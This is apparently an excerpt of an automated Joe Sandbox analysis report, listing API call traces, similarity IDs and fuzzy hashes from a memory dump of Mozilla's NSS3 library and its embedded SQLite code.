                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB61E3B
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CB61E8A
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CB61EAD
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Error$Choice_DecodeTimeUtil
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(00000000,?,6CB63FFF,00000000,?,?,?,?,?,6CB61A1C,00000000,00000000), ref: 6CB6ADA7
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: TlsGetValue.KERNEL32 ref: 6CBC14E0
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: EnterCriticalSection.KERNEL32 ref: 6CBC14F5
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: PR_Unlock.NSS3 ref: 6CBC150D
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CB63FFF,00000000,?,?,?,?,?,6CB61A1C,00000000,00000000), ref: 6CB6ADB4
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C
                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,?,6CB63FFF,?,?,?,?,6CB63FFF,00000000,?,?,?,?,?,6CB61A1C,00000000), ref: 6CB6ADD5
                                                                                                                                                                                                                              • Part of subcall function 6CBBFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CBB8D2D,?,00000000,?), ref: 6CBBFB85
                                                                                                                                                                                                                              • Part of subcall function 6CBBFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CBBFBB1
                                                                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CC894B0,?,?,?,?,?,?,?,?,6CB63FFF,00000000,?), ref: 6CB6ADEC
                                                                                                                                                                                                                              • Part of subcall function 6CBBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC918D0,?), ref: 6CBBB095
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB63FFF), ref: 6CB6AE3C
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CBA1E10: TlsGetValue.KERNEL32 ref: 6CBA1E36
                                                                                                                                                                                                                              • Part of subcall function 6CBA1E10: EnterCriticalSection.KERNEL32(?,?,?,6CB7B1EE,2404110F,?,?), ref: 6CBA1E4B
                                                                                                                                                                                                                              • Part of subcall function 6CBA1E10: PR_Unlock.NSS3 ref: 6CBA1E76
                                                                                                                                                                                                                            • free.MOZGLUE(?,6CB8D079,00000000,00000001), ref: 6CB8CDA5
                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?,6CB8D079,00000000,00000001), ref: 6CB8CDB6
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CB8D079,00000000,00000001), ref: 6CB8CDCF
                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,6CB8D079,00000000,00000001), ref: 6CB8CDE2
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CB8CDE9
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CBF5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CBF5B56
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBF2CEC
                                                                                                                                                                                                                              • Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF
                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6CBF2D02
                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6CBF2D1F
                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6CBF2D42
                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6CBF2D5B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1593528140-0
                                                                                                                                                                                                                            • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                            • Instruction ID: 215a2b6731b273b6720477662404a65502753934802b507a30744073a6c62afb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D101DBB5A002845BE7309F25FC40BC7B7A5EF45318F004525E86D86B10E636F41EC7A3
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CBF5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CBF5B56
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBF2D9C
                                                                                                                                                                                                                              • Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF
                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6CBF2DB2
                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6CBF2DCF
                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6CBF2DF2
                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6CBF2E0B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1593528140-0
                                                                                                                                                                                                                            • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                            • Instruction ID: fc291948f8f2db21fde22ffd71b02fde37804260090d254b5056d55d412d8db7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD01C4B5A002845BEB309F25FC01FC7B7A1EF45318F004435E86986B11E636F82E86A3
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6CC77AFE,?,?,?,?,?,?,?,?,6CC7798A), ref: 6CC7BDC3
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,6CC77AFE,?,?,?,?,?,?,?,?,6CC7798A), ref: 6CC7BDCA
                                                                                                                                                                                                                            • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CC77AFE,?,?,?,?,?,?,?,?,6CC7798A), ref: 6CC7BDE9
                                                                                                                                                                                                                            • free.MOZGLUE(?,00000000,00000000,?,6CC77AFE,?,?,?,?,?,?,?,?,6CC7798A), ref: 6CC7BE21
                                                                                                                                                                                                                            • free.MOZGLUE(00000000,00000000,?,6CC77AFE,?,?,?,?,?,?,?,?,6CC7798A), ref: 6CC7BE32
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: free$CriticalDeleteDestroyMonitorSection
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3662805584-0
                                                                                                                                                                                                                            • Opcode ID: 73687568eca1dd583cae471435284917e147f8553b9acc64a3327626794dd68f
                                                                                                                                                                                                                            • Instruction ID: a8ffaec84688736c6b8174560570752ce3e3f7bc958646d1b70ae91884ccda83
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73687568eca1dd583cae471435284917e147f8553b9acc64a3327626794dd68f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B01145B1B01200CFDF10EF69C82DB063BB8FB0A344B04106BE50AD7300E771A696CBA1
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_Free.NSS3(?), ref: 6CC77C73
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC77C83
                                                                                                                                                                                                                            • malloc.MOZGLUE(00000001), ref: 6CC77C8D
                                                                                                                                                                                                                            • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CC77C9F
                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6CC77CAD
                                                                                                                                                                                                                              • Part of subcall function 6CC29BF0: TlsGetValue.KERNEL32(?,?,?,6CC70A75), ref: 6CC29C07
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 105370314-0
                                                                                                                                                                                                                            • Opcode ID: 576bf63b6a9bdb0fb7310525bb8d0038d30f29fc7d7c92f012ec3152287507f1
                                                                                                                                                                                                                            • Instruction ID: 739defb646cd45b4f62a5475fa805c056f3ccfa1d49afb0bbcc8b149d2a0db67
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 576bf63b6a9bdb0fb7310525bb8d0038d30f29fc7d7c92f012ec3152287507f1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DDF0C2B1D102066FEB109F7A9C09997776CEF04265B018439E809C3B00FB34E114CBE5
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(6CC7A6D8), ref: 6CC7AE0D
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CC7AE14
                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(6CC7A6D8), ref: 6CC7AE36
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CC7AE3D
                                                                                                                                                                                                                            • free.MOZGLUE(00000000,00000000,?,?,6CC7A6D8), ref: 6CC7AE47
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: free$CriticalDeleteSection
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 682657753-0
                                                                                                                                                                                                                            • Opcode ID: b9a55ec881221efc5a53797ea3a34ea251873d528d1e9f2fd6ed989541175760
                                                                                                                                                                                                                            • Instruction ID: 8ad185585eb6244f09f9b76ea2467402f594c7c7e11f433a85a889adbf25cf2c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9a55ec881221efc5a53797ea3a34ea251873d528d1e9f2fd6ed989541175760
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FFF096B5201A01ABCB109FA8D8489577778FF867757144328F53A93940E731E165C7E9
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB07D35
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                            • API String ID: 632333372-598938438
                                                                                                                                                                                                                            • Opcode ID: b166095f23ae7c04cacbf898c01f195ad463da5b44474b2b2b9f740a358d0132
                                                                                                                                                                                                                            • Instruction ID: 4b9f18f7b43914325a4055caf64a513e132ec4c2ad7dbe5e29fad39ce4f4ec60
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b166095f23ae7c04cacbf898c01f195ad463da5b44474b2b2b9f740a358d0132
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5931F471F042799BC710CF9DC8809BEFBE1EF44305B590296E444B7B85E6B1E852C7A1
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CAF6D36
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • database corruption, xrefs: 6CAF6D2A
                                                                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CAF6D20
                                                                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6CAF6D2F
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                            • API String ID: 632333372-598938438
                                                                                                                                                                                                                            • Opcode ID: c1b5f7845376025636f6b7b53e50eee035ca5526f13009c798c380cad4b94162
                                                                                                                                                                                                                            • Instruction ID: 8cfa28b0635e53a8d76eec3758193c1ce5edd26c34faedcb744c22cee3cb53ed
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1b5f7845376025636f6b7b53e50eee035ca5526f13009c798c380cad4b94162
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B210631604B059BC720CE19D941B5AB7F2AF84308F14852CE8699BF51E371F98AC7A1
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CC2CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CC2CC7B), ref: 6CC2CD7A
                                                                                                                                                                                                                              • Part of subcall function 6CC2CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CC2CD8E
                                                                                                                                                                                                                              • Part of subcall function 6CC2CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CC2CDA5
                                                                                                                                                                                                                              • Part of subcall function 6CC2CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CC2CDB8
                                                                                                                                                                                                                            • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CC2CCB5
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(6CCC14F4,6CCC02AC,00000090), ref: 6CC2CCD3
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(6CCC1588,6CCC02AC,00000090), ref: 6CC2CD2B
                                                                                                                                                                                                                              • Part of subcall function 6CB49AC0: socket.WSOCK32(?,00000017,6CB499BE), ref: 6CB49AE6
                                                                                                                                                                                                                              • Part of subcall function 6CB49AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CB499BE), ref: 6CB49AFC
                                                                                                                                                                                                                              • Part of subcall function 6CB50590: closesocket.WSOCK32(6CB49A8F,?,?,6CB49A8F,00000000), ref: 6CB50597
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                                                            • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                                                            • API String ID: 1231378898-412307543
                                                                                                                                                                                                                            • Opcode ID: 6f91631eb574857ebfa7b1f618895800c34c627d6a41072689c5cf698eb42807
                                                                                                                                                                                                                            • Instruction ID: 332e1463d55707daec888456f7b7bf34926fe3f61b0d5dfa000f22aa66d3e499
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f91631eb574857ebfa7b1f618895800c34c627d6a41072689c5cf698eb42807
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE115BF2B002409EEB209F6FDC56B863BB8E746298F141029E506CBB41F775C6148BE6
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_Initialize), ref: 6CB91CD8
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6CB91CF1
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_Now.NSS3 ref: 6CC70A22
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CC70A35
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CC70A66
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_GetCurrentThread.NSS3 ref: 6CC70A70
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CC70A9D
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CC70AC8
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_vsmprintf.NSS3(?,?), ref: 6CC70AE8
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: EnterCriticalSection.KERNEL32(?), ref: 6CC70B19
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC70B48
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC70C76
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_LogFlush.NSS3 ref: 6CC70C7E
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
                                                                                                                                                                                                                            • String ID: pInitArgs = 0x%p$C_Initialize
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC37E10
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC37EA6
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CC37EB5
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CC37ED8
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _byteswap_ulong
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CB66C8D
                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CB66CA9
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CB66CC0
                                                                                                                                                                                                                            • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CC88FE0), ref: 6CB66CFE
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_MillisecondsToInterval.NSS3(?), ref: 6CBD6E36
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBD6E57
                                                                                                                                                                                                                              • Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF
                                                                                                                                                                                                                            • PR_MillisecondsToInterval.NSS3(?), ref: 6CBD6E7D
                                                                                                                                                                                                                            • PR_MillisecondsToInterval.NSS3(?), ref: 6CBD6EAA
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6CBBDDB1,?,00000000), ref: 6CBBDDF4
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: TlsGetValue.KERNEL32 ref: 6CBC14E0
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: EnterCriticalSection.KERNEL32 ref: 6CBC14F5
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: PR_Unlock.NSS3 ref: 6CBC150D
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6CBBDDB1,?,00000000), ref: 6CBBDE0B
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6CBBDDB1,?,00000000), ref: 6CBBDE17
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE009,00000000), ref: 6CBBDE80
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6CBD2E08
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: TlsGetValue.KERNEL32 ref: 6CBC14E0
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: EnterCriticalSection.KERNEL32 ref: 6CBC14F5
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: PR_Unlock.NSS3 ref: 6CBC150D
                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000400), ref: 6CBD2E1C
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CBD2E3B
                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CBD2E95
                                                                                                                                                                                                                              • Part of subcall function 6CBC1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CB688A4,00000000,00000000), ref: 6CBC1228
                                                                                                                                                                                                                              • Part of subcall function 6CBC1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CBC1238
                                                                                                                                                                                                                              • Part of subcall function 6CBC1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CB688A4,00000000,00000000), ref: 6CBC124B
                                                                                                                                                                                                                              • Part of subcall function 6CBC1200: PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0,00000000,00000000,00000000,?,6CB688A4,00000000,00000000), ref: 6CBC125D
                                                                                                                                                                                                                              • Part of subcall function 6CBC1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CBC126F
